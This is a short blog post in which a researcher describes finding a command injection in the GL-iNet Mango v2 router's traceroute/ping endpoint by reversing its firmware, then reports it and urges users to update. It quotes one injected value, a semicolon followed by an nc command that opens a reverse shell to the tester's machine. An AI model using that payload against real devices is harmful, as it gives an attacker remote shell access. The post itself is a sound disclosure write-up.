I had an hour or two to kill before a dentist appointment last summer, so I pulled out the GL-iNet Mango v2 Travel Router I had bought to hack on in just this type of situation. At 30$ and about the size of a credit card, I figured I was bound to find something.
And boy, did it not take long. After opening up the firmware in Ghidra and searching for calls to
system() as a first shot, I stumbled across
traceroute functionality exposed to the web browser that appeared to be taking input directly from a POST parameter and executing the
traceroute command with the IP address/domain name entered into the web form as an argument. While the web form’s URL was not linked to by anything in the administration portal, the
/ping endpoint could be directly navigated to.
; nc <ip> <port> -e /bin/ash as an IP address argument to
traceroute, creating a reverse shell back to my machine.
I reported the vulnerability immediately to GL-iNet, who were gracious and professional. Sadly, I was preëmpted by another guy by several weeks, so they already had a patch ready (we were still within the first guy’s disclosure window.) But, they were kind enough to throw a credit my way as well when they announced the vulnerability on their blog.
So, on that note — if you own a GL-iNet travel router (this vulnerability affects a number of their products, not just the Mango v2) — be sure to update to at least version 3.215.